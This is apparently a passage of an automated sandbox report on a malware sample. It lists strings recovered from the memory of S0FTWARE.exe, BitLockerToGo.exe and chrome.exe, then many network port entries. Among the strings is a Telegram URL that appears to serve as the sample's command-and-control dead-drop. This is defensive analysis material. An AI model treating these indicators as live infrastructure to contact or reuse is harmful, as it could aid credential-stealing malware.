                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m07mbkY/
                        Source: S0FTWARE.exe, 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/m07mbkr08etsqlo.dllMozilla/5.0
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                        Source: S0FTWARE.exe, 00000000.00000002.2229780239.000000000107A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://twitter.comif-unmodified-sinceillegal
                        Source: BitLockerToGo.exe, 00000003.00000003.2464873825.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2512683354.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2542381129.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2497975928.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2527471317.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                        Source: chrome.exe, 00000005.00000003.2664334552.000007C00033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: chrome.exe, 00000005.00000002.2734345767.000007C0006F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734458792.000007C00072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738181133.000007C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733802471.000007C00063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654311777.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2735003578.000007C00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                        Source: chrome.exe, 00000005.00000002.2738181133.000007C000CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                        Source: chrome.exe, 00000005.00000002.2735003578.000007C00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharBl3
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2g
                        Source: chrome.exe, 00000005.00000002.2740718077.000007C00102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2735788481.000007C000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736292118.000007C000964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2735788481.000007C000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736292118.000007C000964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733495555.000007C0005D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: chrome.exe, 00000005.00000002.2732762663.000007C00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686584935.000007C001CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686757739.000007C001D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                        Source: chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                        Source: chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                        Source: chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                        Source: chrome.exe, 00000005.00000002.2736962040.000007C000A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                        Source: chrome.exe, 00000005.00000003.2664334552.000007C00033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                        Source: chrome.exe, 00000005.00000002.2730658183.000007C000038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                        Source: chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                        Source: chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                        Source: chrome.exe, 00000005.00000003.2684558749.000007C001D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686584935.000007C001CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686757739.000007C001D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686000426.000007C001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2684638647.000007C001DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2745039452.000007C001D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                        Source: chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Ed7fPZdAP88.2019.O/rt=j/m=q_dnp
                        Source: chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/)
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                        Source: chrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                        Source: chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlP
                        Source: chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
